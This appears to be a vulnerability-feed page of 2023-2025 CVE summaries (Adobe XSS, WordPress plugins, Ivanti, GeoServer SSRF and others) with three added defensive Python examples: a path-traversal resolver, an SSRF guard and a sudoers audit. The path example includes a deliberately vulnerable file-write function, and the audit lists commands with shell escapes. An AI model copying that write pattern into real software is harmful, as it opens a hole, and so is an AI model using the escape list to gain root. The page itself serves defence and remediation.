Path traversal vulnerability (CWE-22) in a web application that allows authenticated users with high privileges to write arbitrary files to the system by manipulating file paths. While the CVSS score of 7.2 indicates moderate-to-high severity with high impact to confidentiality, integrity, and availability, the requirement for authenticated high-privilege access (PR:H) significantly constrains real-world exploitability. Active exploitation status, public POC availability, and EPSS score are unknown from the provided data, limiting definitive risk prioritization.
Path Traversal
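The entry above is the CWE-22 write variant: a caller-controlled path is joined onto a base directory and used as-is, so "../" segments or an absolute path move the write anywhere the process can reach. The following added example (written for this page, not taken from the affected application) shows that pattern beside a resolver that normalizes the joined path, follows symlinks, and then checks containment with os.path.commonpath rather than a string-prefix test. The directory layout and file names are constructed for the demonstration.

```python
"""Confining caller-controlled file paths to an upload directory: the CWE-22
write pattern next to a resolver that rejects escapes."""
import os
import tempfile


class UnsafePathError(ValueError):
    pass


def vulnerable_write(base_dir: str, user_path: str, data: bytes) -> str:
    # The bug pattern: the caller's path is joined and used as-is, so "../"
    # segments or an absolute path land the write wherever the process can write.
    target = os.path.join(base_dir, user_path)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def resolve_inside(base_dir: str, user_path: str) -> str:
    """Return an absolute path for user_path that is provably inside base_dir."""
    base = os.path.realpath(base_dir)
    if not user_path or os.path.isabs(user_path):
        raise UnsafePathError(f"absolute or empty path rejected: {user_path!r}")
    # Resolve after joining so ".." segments and symlinks are collapsed before
    # the containment check; a prefix test on the raw string is not enough
    # (it would accept "../uploads-old/x" or a symlink pointing outside).
    candidate = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"path escapes {base}: {user_path!r}")
    return candidate


def safe_write(base_dir: str, user_path: str, data: bytes) -> str:
    target = resolve_inside(base_dir, user_path)
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with open(target, "wb") as fh:
        fh.write(data)
    return target


def run_demo() -> dict:
    # Constructed layout: <tmp>/uploads is the only directory writes may touch.
    root = tempfile.mkdtemp()
    base = os.path.join(root, "uploads")
    os.makedirs(base)
    vulnerable_write(base, "../escaped.txt", b"written outside uploads")
    safe_target = safe_write(base, "reports/2025/q1.csv", b"ok")
    rejected = []
    for bad in ("../escaped.txt", "/etc/passwd", "reports/../../x", ""):
        try:
            resolve_inside(base, bad)
        except UnsafePathError:
            rejected.append(bad)
    real_base = os.path.realpath(base)
    return {
        "vulnerable_escaped": os.path.isfile(os.path.join(root, "escaped.txt")),
        "safe_inside": os.path.commonpath([real_base, safe_target]) == real_base,
        "rejected": rejected,
    }


if __name__ == "__main__":
    print(run_demo())
```

Two details matter in practice: realpath must run on the joined result, not on the untrusted input alone, and the comparison has to be a path-component check (commonpath), since a plain startswith would accept a sibling directory whose name begins with the base name.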
-
CVE-2025-5353
HIGH
CVSS 8.8
Credential disclosure vulnerability in Ivanti Workspace Control versions before 10.19.10.0, where a hardcoded cryptographic key enables local authenticated attackers to decrypt stored SQL database credentials. This allows privilege escalation and lateral movement within enterprise environments. With a CVSS score of 8.8 and local attack vector requiring authentication, exploitation requires internal access but poses significant risk to SQL database security and overall system compromise.
Information Disclosure
Ivanti
Authentication Bypass
Workspace Control
-
CVE-2025-5335
HIGH
CVSS 7.8
Privilege escalation vulnerability in Autodesk Installer applications where a maliciously crafted binary placed on an untrusted search path is loaded and executed as NT AUTHORITY\SYSTEM. The attack requires local user interaction (the victim downloads or places the file) but no prior privileges, making it a significant risk for Windows environments running Autodesk products. While CVSS 7.8 indicates high severity, the local attack vector and required user interaction limit the attack surface compared to remote exploits.
RCE
Installer
-
CVE-2025-4954
HIGH
CVSS 8.8
Arbitrary file access vulnerability (CVSS 8.8, High) in the Axle Demo Importer WordPress plugin. A public proof-of-concept is available.
WordPress
PHP
RCE
Privilege Escalation
Axle Demo Importer
-
CVE-2025-4840
HIGH
CVSS 7.5
SQL injection vulnerability (CVSS 7.5, High) in the Likes And Dislikes WordPress plugin through version 1.0.0, which does not properly sanitise and escape a parameter before using it in a SQL query. A public proof-of-concept is available.
WordPress
SQLi
PHP
Likes And Dislikes
-
CVE-2025-4681
HIGH
CVSS 8.6
CVE-2025-4681 is an Improper Privilege Management vulnerability in upKeeper Solutions' upKeeper Instant Privilege Access that allows authenticated local attackers with low privileges to escalate permissions and achieve high-impact confidentiality, integrity, and availability violations. This affects all versions of upKeeper Instant Privilege Access before 1.4.0, and the CVSS 8.6 severity combined with local attack vector and low privilege requirements indicates a significant real-world threat to organizations using this privilege access management solution.
Information Disclosure
-
CVE-2025-4680
HIGH
CVSS 8.6
CVE-2025-4680 is an improper input validation vulnerability in upKeeper Solutions' upKeeper Instant Privilege Access that allows attackers with local access and low privileges to bypass access control security levels and achieve high-impact confidentiality, integrity, and availability violations. Versions before 1.4.0 are affected. With a CVSS score of 8.6 and a local attack vector requiring user interaction, this is a significant privilege escalation risk for organizations using this privileged access management solution; KEV status and public POC availability are not confirmed in available data.
Information Disclosure
-
CVE-2025-4678
HIGH
CVSS 7.0
CVE-2025-4678 is an OS command injection vulnerability in Pandora ITSM 5.0.105 where the chromium_path variable fails to properly neutralize special elements, allowing authenticated attackers with high privileges to execute arbitrary system commands. With a CVSS score of 7.0 and network-accessible attack vector, this vulnerability poses a significant risk to affected deployments, particularly if the system is exposed to untrusted administrative users or if privilege escalation chains exist.
Command Injection
-
CVE-2025-4601
HIGH
CVSS 8.8
The RH - Real Estate WordPress Theme contains a privilege management vulnerability (CWE-269) that allows authenticated users with subscriber-level access or higher to escalate their account privileges to administrator through the inspiry_update_profile() function. All versions up to and including 4.4.0 are affected; version 4.4.0 contains a partial patch, while 4.4.1 provides complete remediation. With a CVSS score of 8.8 and a network attack vector requiring only low-privilege authentication, this is a serious privilege escalation risk for any WordPress installation using this theme.
WordPress
Privilege Escalation
PHP
-
CVE-2025-4387
HIGH
CVSS 8.8
The Abandoned Cart Pro for WooCommerce plugin (versions ≤9.16.0) contains an authenticated arbitrary file upload vulnerability in the wcap_add_to_cart_popup_upload_files function that lacks file type validation. Authenticated attackers with subscriber-level privileges can upload arbitrary files to the server, potentially enabling remote code execution depending on server configuration. This is a high-severity vulnerability (CVSS 8.8) affecting WooCommerce e-commerce sites; exploitation requires valid user credentials but no user interaction.
WordPress
File Upload
RCE
PHP
-
CVE-2025-3052
HIGH
CVSS 8.2
Arbitrary write vulnerability (CVSS 8.2, High) in Microsoft-signed UEFI firmware that permits an attacker who already holds high privileges to execute untrusted code and modify firmware settings stored in NVRAM, which can provide persistence below the operating system and full system compromise. The vulnerability affects UEFI implementations across multiple Microsoft platforms. KEV status and EPSS probability were not provided in available sources; the local attack vector and high privilege requirement point to targeted use against specific systems rather than widespread exploitation.
Microsoft
RCE
Redhat
-
CVE-2025-0052
HIGH
CVSS 8.3
CVE-2025-0052 is an improper input validation vulnerability in Pure Storage FlashBlade's authentication process that allows unauthenticated network attackers to trigger a denial of service condition with high availability impact. While the CVSS score of 8.3 reflects significant availability risk, the high attack complexity (AC:H) suggests practical exploitation requires specific conditions. No confirmed KEV/CISA status, active exploitation, or public POC has been disclosed at the time of analysis.
Denial Of Service
-
CVE-2025-0051
HIGH
CVSS 8.7
Improper input validation vulnerability in Pure Storage FlashArray's authentication process that enables unauthenticated network-based denial of service attacks. The vulnerability allows remote attackers without credentials to crash or degrade the availability of affected FlashArray systems by sending malformed authentication requests. This is a high-severity issue (CVSS 8.7) with network accessibility and no authentication requirements, making it broadly exploitable across internet-exposed or network-accessible FlashArray deployments.
Denial Of Service
-
CVE-2024-43706
HIGH
CVSS 7.6
CVE-2024-43706 is an improper authorization vulnerability in Kibana's Synthetic monitor endpoint that allows authenticated users to escalate privileges through direct HTTP requests. Attackers with low-level credentials can bypass access controls to perform unauthorized actions on synthetic monitoring functionality, potentially affecting confidentiality, integrity, and availability. While the CVSS 7.6 score indicates significant risk, real-world impact depends on deployment context and whether this vulnerability is actively exploited in the wild.
Elastic
Privilege Escalation
Authentication Bypass
Kibana
-
CVE-2024-29198
HIGH
CVSS 7.5
GeoServer contains a Server-Side Request Forgery (SSRF) vulnerability in the Demo request endpoint (TestWfsPost servlet) that allows unauthenticated network attackers to make arbitrary HTTP requests from the server when Proxy Base URL is not configured. This high-severity vulnerability (CVSS 7.5) affects GeoServer versions prior to 2.24.4 and 2.25.2, enabling attackers to access internal resources, cloud metadata endpoints, and potentially interact with backend systems.
Java
SSRF
Geoserver
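The GeoServer entry above describes the standard SSRF shape: a server-side endpoint forwards requests to a URL the client supplies, and with no configured base to pin against it will happily reach loopback, RFC 1918 space, or a cloud metadata address. The following added example (written for this page, not GeoServer's own fix or code) implements two guards a practitioner would combine: same-origin pinning when a public base URL is configured, and a resolved-IP deny-list for deployments that genuinely must fetch from arbitrary hosts. The DNS answers are a constructed table so the example runs offline; the host names and the allowed-origin value are assumptions for the demonstration.

```python
"""Outbound-request guard for a server-side fetch endpoint: pin to a configured
base origin, or, when arbitrary hosts must be reachable, refuse targets that
resolve into loopback, private, link-local or cloud-metadata ranges."""
import ipaddress
import socket
from urllib.parse import urlparse


class SsrfBlocked(ValueError):
    pass


BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]
_DEFAULT_PORT = {"http": 80, "https": 443}

DEMO_DNS = {  # constructed answers; nothing here is resolved over the network
    "maps.example.org": "198.51.100.7",
    "metadata.internal": "169.254.169.254",
    "db.corp.local": "10.20.30.40",
}


def demo_resolver(host: str) -> str:
    return DEMO_DNS[host]


def is_blocked_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # ::ffff:169.254.169.254 is the metadata address in an IPv6 wrapper.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return any(addr in net for net in BLOCKED_NETS)


def _origin(url: str):
    u = urlparse(url)
    if u.scheme not in _DEFAULT_PORT or not u.hostname:
        raise SsrfBlocked(f"unsupported scheme or missing host: {url!r}")
    return u.scheme, u.hostname.lower(), u.port or _DEFAULT_PORT[u.scheme]


def check_outbound_url(url: str, allowed_origin=None, resolver=socket.gethostbyname) -> str:
    """Return the IP the request may connect to, or raise SsrfBlocked."""
    scheme, host, port = _origin(url)
    if allowed_origin is not None:
        # Same-origin pinning: only the configured public base is reachable,
        # so the deny-list is not needed even if that base is internal.
        if (scheme, host, port) != _origin(allowed_origin):
            raise SsrfBlocked(f"{url!r} is not on the configured origin {allowed_origin!r}")
    try:
        ip = str(ipaddress.ip_address(host))  # literal address in the URL
    except ValueError:
        # Resolve exactly once and connect to this IP, not the name again,
        # otherwise a rebinding DNS answer can swap in an internal address.
        ip = resolver(host)
    if allowed_origin is None and is_blocked_ip(ip):
        raise SsrfBlocked(f"{host} resolves to blocked address {ip}")
    return ip


def classify(url: str, allowed_origin=None, resolver=demo_resolver) -> str:
    # Convenience wrapper for the demo: "allowed:<ip>" or "blocked".
    try:
        return "allowed:" + check_outbound_url(url, allowed_origin, resolver)
    except SsrfBlocked:
        return "blocked"


if __name__ == "__main__":
    for target in ("http://maps.example.org/wfs", "http://169.254.169.254/latest/meta-data/",
                   "http://[::ffff:169.254.169.254]/", "http://db.corp.local:5432/"):
        print(target, "->", classify(target))
    print("pinned:", classify("http://metadata.internal/", "http://maps.example.org"))
```

The deny-list is a fallback, not a substitute for pinning: it cannot know about every internal range, and redirects from an allowed host still need the same check on each hop.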
-
CVE-2024-13090
HIGH
CVSS 7.0
Privilege escalation vulnerability affecting service accounts through excessively permissive sudo rules that could allow elevation to administrative privileges. The vulnerability requires local access and lower privileges to exploit (CVSS 7.0), but notably, no actual exploitation vector has been identified in the wild. While the CVSS score indicates high impact potential, the absence of a confirmed attack vector and lack of active exploitation signals suggest this is a configuration hardening issue rather than an immediately critical threat.
Privilege Escalation
Linux
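The sudo entry above is a configuration weakness rather than a code bug, so the useful artifact is an audit that finds the rules before an attacker does. The following added example (written for this page, not vendor tooling) parses a constructed sudoers fragment and flags non-root rules that grant ALL, that allow NOPASSWD execution of commands with well-known shell escapes (vim, find, less and the like), or that carry wildcards in arguments, which sudo matches across "/" and extra arguments. The sample rules and account names are constructed; the shell-escape list is a starting point, not an exhaustive one.

```python
"""Audit sudoers rules for accounts that can reach root: ALL grants, NOPASSWD
on commands with known shell escapes, and wildcards in command arguments."""
import re

SAMPLE_SUDOERS = """\
# constructed sample file, not taken from any real host
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
%admin      ALL=(ALL) ALL
backup      ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/data/ /mnt/backup/
svc-monitor ALL=(ALL) NOPASSWD: ALL
svc-deploy  ALL=(root) NOPASSWD: /usr/bin/vim /etc/app/*.conf
svc-report  ALL=(root) NOPASSWD: /usr/bin/find /var/log -name *.log
www-data    ALL=(root) /usr/bin/systemctl restart app
"""

# Commands that hand the caller a shell or an arbitrary file write once run as root.
SHELL_ESCAPES = {"/bin/sh", "/bin/bash", "/usr/bin/vi", "/usr/bin/vim", "/usr/bin/less",
                 "/usr/bin/more", "/usr/bin/find", "/usr/bin/env", "/usr/bin/python3",
                 "/usr/bin/perl", "/usr/bin/awk", "/usr/bin/tee"}
_RULE = re.compile(r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
                   r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
_TAG = re.compile(r"^(?:NO)?(?:PASSWD|SETENV|EXEC|MAIL|FOLLOW|LOG_INPUT|LOG_OUTPUT|INTERCEPT):\s*")
_SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def parse_rules(text: str):
    # Yields one record per command in each user specification; alias
    # definitions are out of scope for this check and are skipped.
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            nopasswd = False
            while (tag := _TAG.match(spec)):
                nopasswd = nopasswd or spec.startswith("NOPASSWD")
                spec = spec[tag.end():]
            parts = spec.split()
            yield {"user": m.group("user"), "runas": m.group("runas") or "root",
                   "command": parts[0], "args": parts[1:], "nopasswd": nopasswd}


def audit_sudoers(text: str):
    findings = []
    for r in parse_rules(text):
        if r["user"] == "root":
            continue
        reasons = []
        if r["command"] == "ALL":
            reasons.append("unrestricted ALL command grant")
        elif r["command"] in SHELL_ESCAPES:
            reasons.append(f"{r['command']} offers a shell escape or arbitrary file write")
        if any(ch in arg for arg in r["args"] for ch in "*?"):
            reasons.append("wildcard in arguments; sudo's * also matches '/' and extra arguments")
        if reasons:
            findings.append({"user": r["user"], "runas": r["runas"], "command": r["command"],
                             "nopasswd": r["nopasswd"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['user']}: {flag}{f['command']} -> " + "; ".join(f["reasons"]))
```

Run it against `sudo -l -U <account>` output or the files under /etc/sudoers.d after the aliases have been expanded; findings with nopasswd set on a service account are the ones that turn a compromised daemon into root without any further exploit.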
-
CVE-2024-13089
HIGH
CVSS 7.2
CVE-2024-13089 is an OS command injection vulnerability in the update functionality of Nozomi Networks Guardian and CMC appliances that allows authenticated administrators to bypass signature validation and execute arbitrary OS commands. While the vulnerability requires high-privilege administrative access, the improper cryptographic signature validation on update packages creates a critical integrity bypass that could lead to complete system compromise. The attack is network-accessible with no user interaction required once an administrator initiates an update.
Command Injection
-
CVE-2023-20599
HIGH
CVSS 7.9
CVE-2023-20599 is an improper register access control vulnerability in AMD's ASP (AMD Secure Processor) that allows a privileged local attacker to gain unauthorized access to the Crypto Co-Processor (CCP) registers, potentially compromising cryptographic key management and leading to loss of confidentiality or integrity. The vulnerability affects AMD EPYC and Ryzen processors with ASP implementations. While the CVSS score of 7.9 indicates high severity, exploitation requires high privilege level (PR:H) and local access (AV:L), limiting real-world attack surface; however, this is an actively tracked vulnerability relevant to data center and workstation security.
Privilege Escalation
Information Disclosure
-
CVE-2025-49510
MEDIUM
CVSS 4.3
Cross-Site Request Forgery (CSRF) vulnerability in WPFactory Min Max Step Quantity Limits Manager for WooCommerce. This issue affects Min Max Step Quantity Limits Manager for WooCommerce from n/a through 5.1.0.
WordPress
CSRF
PHP
-
CVE-2025-49509
MEDIUM
CVSS 5.3
CVE-2025-49509 is a security vulnerability (CVSS 5.3). Remediation should follow standard vulnerability management procedures.
Authentication Bypass
-
CVE-2025-49143
MEDIUM
CVSS 5.9
Nautobot is a Network Source of Truth and Network Automation Platform. Prior to v2.4.10 and v1.6.32, files uploaded by users to Nautobot's MEDIA_ROOT directory, including DeviceType image attachments as well as images attached to a Location, Device, or Rack, are served to users via a URL endpoint that was not enforcing user authentication. As a consequence, such files can be retrieved by anonymous users who know or can guess the correct URL for a given file. Nautobot v2.4.10 and v1.6.32 address this issue by adding enforcement of Nautobot user authentication to this endpoint.
Information Disclosure
Nautobot
-
CVE-2025-49133
MEDIUM
CVSS 5.9
Libtpms is a library that targets the integration of TPM functionality into hypervisors, primarily into Qemu. Libtpms, which is derived from the TPM 2.0 reference implementation code published by the Trusted Computing Group, is prone to a potential out of bounds (OOB) read vulnerability. The vulnerability occurs in the CryptHmacSign function with an inconsistent pairing of the signKey and signScheme parameters, where the signKey is an ALG_KEYEDHASH key and inScheme is an ECC or RSA scheme. CryptHmacSign is defined in the "Part 4: Supporting Routines - Code" document, section "7.151 - /tpm/src/crypt/CryptUtil.c". This vulnerability can be triggered from user-mode applications by sending malicious commands to a TPM 2.0/vTPM (swtpm) whose firmware is based on an affected TCG reference implementation. The effect on libtpms is an abort on detection of the out-of-bounds access, for example making a vTPM (swtpm) unavailable to a VM. This vulnerability is fixed in 0.7.12, 0.8.10, 0.9.7, and 0.10.1.
Buffer Overflow
Information Disclosure
Ubuntu
Debian
Libtpms
-
CVE-2025-48937
MEDIUM
CVSS 4.9
matrix-rust-sdk is an implementation of a Matrix client-server library in Rust. matrix-sdk-crypto since version 0.8.0 and up to 0.11.0 does not correctly validate the sender of an encrypted event. Accordingly, a malicious homeserver operator can modify events served to clients, making those events appear to the recipient as if they were sent by another user. This vulnerability is fixed in 0.11.1 and 0.12.0.
Authentication Bypass
Suse
-
CVE-2025-48879
MEDIUM
CVSS 6.5
OctoPrint versions up to and including 1.11.1 contain a vulnerability (CVSS 6.5) that an unauthenticated attacker can trigger. A vendor patch is available; remediation should follow standard vulnerability management procedures.
Information Disclosure
Debian
Octoprint
-
CVE-2025-48067
MEDIUM
CVSS 5.4
CVE-2025-48067 is a vulnerability in OctoPrint (CVSS 5.4) exploitable by an attacker who holds the file_upload permission. A vendor patch is available; remediation should follow standard vulnerability management procedures.
Information Disclosure
Debian
Octoprint
-
CVE-2025-47969
MEDIUM
CVSS 4.4
Exposure of sensitive information to an unauthorized actor in Windows Hello allows an authorized attacker to disclose information locally.
Microsoft
Information Disclosure
Windows Server 2025
Windows 11 24h2
Windows 11 23h2
-
CVE-2025-47956
MEDIUM
CVSS 5.5
External control of file name or path in Windows Security App (CVSS 5.5) that an authorized attacker can exploit. Remediation should follow standard vulnerability management procedures.
Microsoft
Information Disclosure
Windows Security App
Windows
-
CVE-2025-47171
MEDIUM
CVSS 6.7
Improper input validation in Microsoft Office Outlook allows an authorized attacker to execute code locally.
Microsoft
Information Disclosure
365 Apps
Office Long Term Servicing Channel
Office
-
CVE-2025-47160
MEDIUM
CVSS 5.4
Protection mechanism failure in Windows Shell allows an unauthorized attacker to bypass a security feature over a network.
Microsoft
Authentication Bypass
Windows 10 1507
Windows 11 24h2
Windows Server 2016
-
CVE-2025-47117
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47116
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47115
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47114
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47113
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47112
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Adobe
Information Disclosure
Acrobat Dc
Acrobat Reader
-
CVE-2025-47111
MEDIUM
CVSS 5.5
Acrobat Reader versions 24.001.30235, 20.005.30763, 25.001.20521 and earlier are affected by a NULL Pointer Dereference vulnerability that could lead to application denial-of-service. An attacker could exploit this vulnerability to crash the application, causing a disruption in service. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Null Pointer Dereference
Adobe
Denial Of Service
Acrobat
Acrobat Reader Dc
-
CVE-2025-47106
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Use After Free
Denial Of Service
Memory Corruption
Indesign
-
CVE-2025-47105
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Information Disclosure
Indesign
-
CVE-2025-47104
MEDIUM
CVSS 5.5
InDesign Desktop versions ID20.2, ID19.5.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
Buffer Overflow
Information Disclosure
Indesign
-
CVE-2025-47102
MEDIUM
CVSS 5.4
Rejected reason: This CVE ID was issued in error by its CVE Numbering Authority and does not represent a valid vulnerability. The CVSS 5.4 (Medium) rating and the remote, low-complexity attributes still attached to this record predate the rejection and should not be used for prioritization; no vendor patch applies to a rejected ID.
Information Disclosure
-
CVE-2025-47094
MEDIUM
CVSS 6.1
Adobe Experience Manager versions 6.5.22 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If an attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.
Adobe
XSS
Experience Manager
-
CVE-2025-47093
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47092
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47091
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47090
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47089
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47088
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47087
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47086
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47085
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47084
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47083
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47082
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47081
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47080
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47079
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47078
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47077
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
Adobe
XSS
Experience Manager
-
CVE-2025-47076
MEDIUM
CVSS 5.4
Adobe Experience Manager versions 6.5.22 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
